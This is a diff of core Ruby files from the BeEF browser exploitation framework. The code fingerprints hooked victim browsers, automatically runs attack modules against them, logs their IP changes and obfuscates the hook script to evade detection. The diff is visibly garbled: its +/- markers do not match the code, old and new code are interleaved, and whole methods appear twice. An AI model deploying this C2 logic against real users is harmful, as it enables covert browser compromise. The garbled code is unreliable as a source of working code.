            self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
          end
          # get and store the date
          date_stamp = get_param(@data['results'], 'DateStamp')
          if BeEF::Filters.is_valid_date_stamp?(date_stamp)
@@ -167,11 +168,11 @@ module BeEF
          end
          # get and store the system platform
-          system_platform = get_param(@data['results'], 'SystemPlatform')
+          system_platform = get_param(@data['results'], 'BrowserPlatform')
          if BeEF::Filters.is_valid_system_platform?(system_platform)
-            BD.set(session_id, 'SystemPlatform', system_platform)
+            BD.set(session_id, 'BrowserPlatform', system_platform)
          else
-            self.err_msg "Invalid system platform returned from the hook browser's initial connection."
+            self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
          end
          # get and store the hooked browser type
@@ -222,6 +223,14 @@ module BeEF
            self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasPhonegap
          has_phonegap = get_param(@data['results'], 'HasPhonegap')
          if BeEF::Filters.is_valid_yes_no?(has_phonegap)
            BD.set(session_id, 'HasPhonegap', has_phonegap)
          else
            self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasGoogleGears
          has_googlegears = get_param(@data['results'], 'HasGoogleGears')
          if BeEF::Filters.is_valid_yes_no?(has_googlegears)
@@ -230,6 +239,14 @@ module BeEF
            self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasFoxit
          has_foxit = get_param(@data['results'], 'HasFoxit')
          if BeEF::Filters.is_valid_yes_no?(has_foxit)
            BD.set(session_id, 'HasFoxit', has_foxit)
          else
            self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasWebSocket
          has_web_socket = get_param(@data['results'], 'HasWebSocket')
          if BeEF::Filters.is_valid_yes_no?(has_web_socket)
@@ -246,6 +263,62 @@ module BeEF
            self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasSilverlight
          has_silverlight = get_param(@data['results'], 'HasSilverlight')
          if BeEF::Filters.is_valid_yes_no?(has_silverlight)
            BD.set(session_id, 'HasSilverlight', has_silverlight)
          else
            self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasQuickTime
          has_quicktime = get_param(@data['results'], 'HasQuickTime')
          if BeEF::Filters.is_valid_yes_no?(has_quicktime)
            BD.set(session_id, 'HasQuickTime', has_quicktime)
          else
            self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasRealPlayer
          has_realplayer = get_param(@data['results'], 'HasRealPlayer')
          if BeEF::Filters.is_valid_yes_no?(has_realplayer)
            BD.set(session_id, 'HasRealPlayer', has_realplayer)
          else
            self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasWMP
          has_wmp = get_param(@data['results'], 'HasWMP')
          if BeEF::Filters.is_valid_yes_no?(has_wmp)
            BD.set(session_id, 'HasWMP', has_wmp)
          else
            self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
          end
          # get and store the yes|no value for HasVLC
          has_vlc = get_param(@data['results'], 'HasVLC')
          if BeEF::Filters.is_valid_yes_no?(has_vlc)
            BD.set(session_id, 'HasVLC', has_vlc)
          else
            self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
          end
          # get and store the value for CPU
          cpu_type = get_param(@data['results'], 'CPU')
          if !cpu_type.nil?
            BD.set(session_id, 'CPU', cpu_type)
          else
            self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
          end
          # get and store the value for TouchEnabled
          touch_enabled = get_param(@data['results'], 'TouchEnabled')
          if BeEF::Filters.is_valid_yes_no?(touch_enabled)
            BD.set(session_id, 'TouchEnabled', touch_enabled)
          else
            self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
          end
          # get and store whether the browser has session cookies enabled
          has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
          if BeEF::Filters.is_valid_yes_no?(has_session_cookies)
@@ -263,23 +336,29 @@ module BeEF
          end
          # log a few info of newly hooked zombie in the console
-          print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
+          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
          # Call autorun modules
-          autorun = []
+          if config.get('beef.autorun.enable')
-          BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
+            autorun = []
-            if v.has_key?('autorun') and v['autorun'] == true
+            BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
-              if BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
+              if v.has_key?('autorun') and v['autorun'] == true
-                BeEF::Module.execute(k, session_id)
+                target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
-                autorun.push(k)
+                if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
-              else
+                  BeEF::Module.execute(k, session_id)
-                print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser #{zombie.ip}"
+                  autorun.push(k)
                elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
                  BeEF::Module.execute(k, session_id)
                  autorun.push(k)
                else
                  print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
                end
              end
            }
            if autorun.length > 0
              print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
            end
          }
          if autorun.length > 0
            print_info "Autorun executed: #{autorun.join(', ')} against Hooked browser #{zombie.ip}"
          end
        end
--- a/core/main/handlers/commands.rb
+++ b/core/main/handlers/commands.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Core
--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
@@ -61,13 +51,25 @@ module Handlers
      # @note is a known browser so send instructions 
      else       
        # @note Check if we haven't seen this browser for a while, log an event if we haven't
        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
        end
        # @note record the last poll from the browser
        hooked_browser.lastseen = Time.new.to_i
        # @note Check for a change in zombie IP and log an event
-        if hooked_browser.ip != request.ip
+        if config.get('beef.http.use_x_forward_for') == true
-          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
+          if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
-          hooked_browser.ip = request.ip
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
            hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
          end
        else
          if hooked_browser.ip != request.ip
           BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
           hooked_browser.ip = request.ip
          end
        end
        hooked_browser.count!
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -1,136 +1,169 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
-module Core
+  module Core
-module Handlers
+    module Handlers
-module Modules
+      module Modules
-  # @note Purpose: avoid rewriting several times the same code.
+        # @note Purpose: avoid rewriting several times the same code.
-  module BeEFJS
+        module BeEFJS
-    # Builds the default beefjs library (all default components of the library).
+          # Builds the default beefjs library (all default components of the library).
-    # @param [Object] req_host The request object
+          # @param [Object] req_host The request object
-    def build_beefjs!(req_host)
+          def build_beefjs!(req_host)
-      config = BeEF::Core::Configuration.instance
+            config = BeEF::Core::Configuration.instance
-      # @note set up values required to construct beefjs
+            # @note set up values required to construct beefjs
-      beefjs = ''
+            beef_js = ''
-      # @note location of sub files
+            # @note location of sub files
-      beefjs_path = "#{$root_dir}/core/main/client/"
+            beef_js_path = "#{$root_dir}/core/main/client/"
      # @note we load websocket library only if ws server is enabled in config.yalm
      # check in init.js
      if config.get("beef.http.websocket.enable")
        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
      else
        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
      end
-      # @note construct the beefjs string from file(s)
+            # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
-      js_sub_files.each {|js_sub_file_name|
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
        js_sub_file_abs_path = beefjs_path + js_sub_file_name
        beefjs << (File.read(js_sub_file_abs_path) + "\n\n")
      }
-      # @note create the config for the hooked browser session
+            # @note BeEF libraries: need Eruby evaluation and obfuscation
            beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
            # @note Load websocket library only if WS server is enabled in config.yaml
            if config.get("beef.http.websocket.enable") == true
              beef_js_sub_files << "websocket.js"
            end
-      hook_session_name = config.get('beef.http.hook_session_name')
+            # @note antisnatchor: leave timeout.js as the last one!
-      hook_session_config = BeEF::Core::Server.instance.to_h
+            beef_js_sub_files << "timeout.js"
-      # @note if http_host="0.0.0.0" in config ini, use the host requested by client
+            ext_js_to_obfuscate = ''
-      if hook_session_config['beef_host'].eql? "0.0.0.0"
+            ext_js_to_not_obfuscate = ''
        hook_session_config['beef_host'] = req_host
        hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
      end
-      # @note if http_port <> public_port in config ini, use the public_port
+            # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
-      unless hook_session_config['beef_public_port'].nil?
+            # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
-        if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
+            ext_js_sub_files.each{ |ext_js_sub_file|
-          hook_session_config['beef_port'] = hook_session_config['beef_public_port']
+              if config.get("beef.extension.evasion.enable")
-          hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+                if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
-          if hook_session_config['beef_public_port'] == '443'
+                  print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
-            hook_session_config['beef_url'].sub!(/http:/, 'https:')
+                  # do not obfuscate the file
                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
                  ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
                else
                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
                  ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
                end
              else
                # Evasion is not enabled, do not obfuscate anything
                ext_js_sub_file_path = beef_js_path + ext_js_sub_file
                ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
              end
            }
            # @note construct the beef_js string from file(s)
            beef_js_sub_files.each { |beef_js_sub_file|
              beef_js_sub_file_path = beef_js_path + beef_js_sub_file
              beef_js << (File.read(beef_js_sub_file_path) + "\n\n")
            }
            # @note create the config for the hooked browser session
            hook_session_config = BeEF::Core::Server.instance.to_h
            # @note if http_host="0.0.0.0" in config ini, use the host requested by client
            unless hook_session_config['beef_public'].nil?
              if hook_session_config['beef_host'] != hook_session_config['beef_public']
                hook_session_config['beef_host'] = hook_session_config['beef_public']
                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_host']}/, hook_session_config['beef_public'])
              end
            end
            if hook_session_config['beef_host'].eql? "0.0.0.0"
              hook_session_config['beef_host'] = req_host
              hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
            end
            # @note set the XHR-polling timeout
            hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
            # @note set the hook file path and BeEF's cookie name
            hook_session_config['hook_file'] = config.get("beef.http.hook_file")
            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
            # @note if http_port <> public_port in config ini, use the public_port
            unless hook_session_config['beef_public_port'].nil?
              if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
                hook_session_config['beef_port'] = hook_session_config['beef_public_port']
                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
                if hook_session_config['beef_public_port'] == '443'
                  hook_session_config['beef_url'].sub!(/http:/, 'https:')
                end
              end
            end
            # @note Set some WebSocket properties
            if config.get("beef.http.websocket.enable")
              hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
              hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
              hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout")
              hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
            end
            # @note populate place holders in the beef_js string and set the response body
            eruby = Erubis::FastEruby.new(beef_js)
            @hook = eruby.evaluate(hook_session_config)
            if config.get("beef.extension.evasion.enable")
              evasion = BeEF::Extension::Evasion::Evasion.instance
              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
            else
              @final_hook = ext_js_to_not_obfuscate + @hook
            end
            # @note Return the final hook to be sent to the browser
            @body << @final_hook
          end
          # Finds the path to js components
          # @param [String] component Name of component
          # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
          def find_beefjs_component_path(component)
            component_path = component
            component_path.gsub!(/beef./, '')
            component_path.gsub!(/\./, '/')
            component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
            return false if not File.exists? component_path
            component_path
          end
          # Builds missing beefjs components.
          # @param [Array] beefjs_components An array of component names
          def build_missing_beefjs_components(beefjs_components)
            # @note verifies that @beef_js_cmps is not nil to avoid bugs
            @beef_js_cmps = '' if @beef_js_cmps.nil?
            if beefjs_components.is_a? String
              beefjs_components_path = find_beefjs_component_path(beefjs_components)
              raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
              beefjs_components = {beefjs_components => beefjs_components_path}
            end
            beefjs_components.keys.each { |k|
              next if @beef_js_cmps.include? beefjs_components[k]
              # @note path to the component
              component_path = beefjs_components[k]
              # @note we output the component to the hooked browser
              @body << File.read(component_path)+"\n\n"
              # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
              if @beef_js_cmps.eql? ''
                @beef_js_cmps = component_path
              else
                @beef_js_cmps += ",#{component_path}"
              end
            }
          end
        end
      end
      if config.get("beef.http.websocket.enable")
        hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
        hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
        hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
      end
      # @note populate place holders in the beefjs string and set the response body
      eruby = Erubis::FastEruby.new(beefjs)
      @hook = eruby.evaluate(hook_session_config)
      if config.get("beef.extension.evasion.enable")
        evasion = BeEF::Extension::Evasion::Evasion.instance
        @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
      end
      @body << @hook
    end
    # Finds the path to js components
    # @param [String] component Name of component
    # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
    def find_beefjs_component_path(component)
      component_path = component
      component_path.gsub!(/beef./, '')
      component_path.gsub!(/\./, '/')
      component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
      return false if not File.exists? component_path
      component_path
    end
    # Builds missing beefjs components.
    # @param [Array] beefjs_components An array of component names
    def build_missing_beefjs_components(beefjs_components)
      # @note verifies that @beef_js_cmps is not nil to avoid bugs
      @beef_js_cmps = '' if @beef_js_cmps.nil?
      if beefjs_components.is_a? String
        beefjs_components_path = find_beefjs_component_path(beefjs_components)
        raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
        beefjs_components = {beefjs_components => beefjs_components_path}
      end
      beefjs_components.keys.each {|k|
        next if @beef_js_cmps.include? beefjs_components[k]
        # @note path to the component
        component_path = beefjs_components[k]
        # @note we output the component to the hooked browser
        @body << File.read(component_path)+"\n\n"
        # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
        if @beef_js_cmps.eql? ''
          @beef_js_cmps = component_path
        else
          @beef_js_cmps += ",#{component_path}"
        end
      }
    end
  end
 end
 end
 end
 end
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module Core
@@ -61,19 +51,11 @@ module BeEF
            #todo antisnatchor: remove this gsub crap adding some hook packing.
            if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
              #content = command_module.output.gsub('//
              #//   Copyright 2012 Wade Alcorn wade@bindshell.net
              #//
-              #//   Licensed under the Apache License, Version 2.0 (the "License");
+              #//   Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-              #//   you may not use this file except in compliance with the License.
+              #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
-              #//   You may obtain a copy of the License at
+              #//   See the file 'doc/COPYING' for copying permission
              #//
              #//       http://www.apache.org/licenses/LICENSE-2.0
              #//
              #//   Unless required by applicable law or agreed to in writing, software
              #//   distributed under the License is distributed on an "AS IS" BASIS,
              #//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
              #//   See the License for the specific language governing permissions and
              #//   limitations under the License.
              #//', "")
              ws.send(@output, hooked_browser.session)
            else
@@ -82,7 +64,7 @@ module BeEF
            # @note prints the event to the console
            if BeEF::Settings.console?
              name = command_module.friendlyname || kclass
-              print_info "Hooked browser #{hooked_browser.ip} has been sent instructions from command module '#{name}'"
+              print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module [id:#{command.id}, name:'#{name}']"
            end
            # @note flag that the command has been sent to the hooked browser
--- a/core/main/logger.rb
+++ b/core/main/logger.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
@@ -24,6 +14,10 @@ module Core
    # Constructor
    def initialize
      @logs = BeEF::Core::Models::Log
      @config = BeEF::Core::Configuration.instance
      # if notifications are enabled create a new instance
      @notifications = BeEF::Extension::Notifications::Notifications unless @config.get('beef.extension.notifications.enable') == false
    end
    # Registers a new event in the logs
@@ -34,6 +28,9 @@ module Core
    def register(from, event, hb = 0)
      # type conversion to enforce standards
      hb = hb.to_i
      # get time now
      time_now = Time.now
      # arguments type checking
      raise Exception::TypeError, '"from" needs to be a string' if not from.string?
@@ -41,7 +38,12 @@ module Core
      raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
      # logging the new event into the database
-      @logs.new(:type => "#{from}", :event => "#{event}", :date => Time.now, :hooked_browser_id => hb).save
+      @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
      # if notifications are enabled send the info there too
      if @notifications
        @notifications.new(from, event, time_now, hb)
      end
      # return
      true
--- a/core/main/migration.rb
+++ b/core/main/migration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module Core
@@ -62,7 +52,7 @@ module Models
      browserdetails
    end
-  
+ 
    #
    # Returns the icon representing the browser type the
    # hooked browser is using (i.e. Firefox, Internet Explorer)
@@ -94,9 +84,10 @@ module Models
      return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
      return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
      return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
+      return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
      return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
      return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
      return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
@@ -105,6 +96,35 @@ module Models
      BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
    end
    #
    # Returns the icon representing the hardware the
    # zombie is running on (i.e. iPhone, BlackBerry)
    #
    def self.hw_icon(session_id)
      ua_string = get(session_id, 'BrowserReportedName')
      hardware  = get(session_id, 'Hardware')
      return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
      return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
      return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
      return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
      return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
      return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR
      return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
      return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
      return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
      return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR
      return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR
      return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR
      return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR
      return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR
 	return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR
      BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
    end
  end
 end
--- a/core/main/models/command.rb
+++ b/core/main/models/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
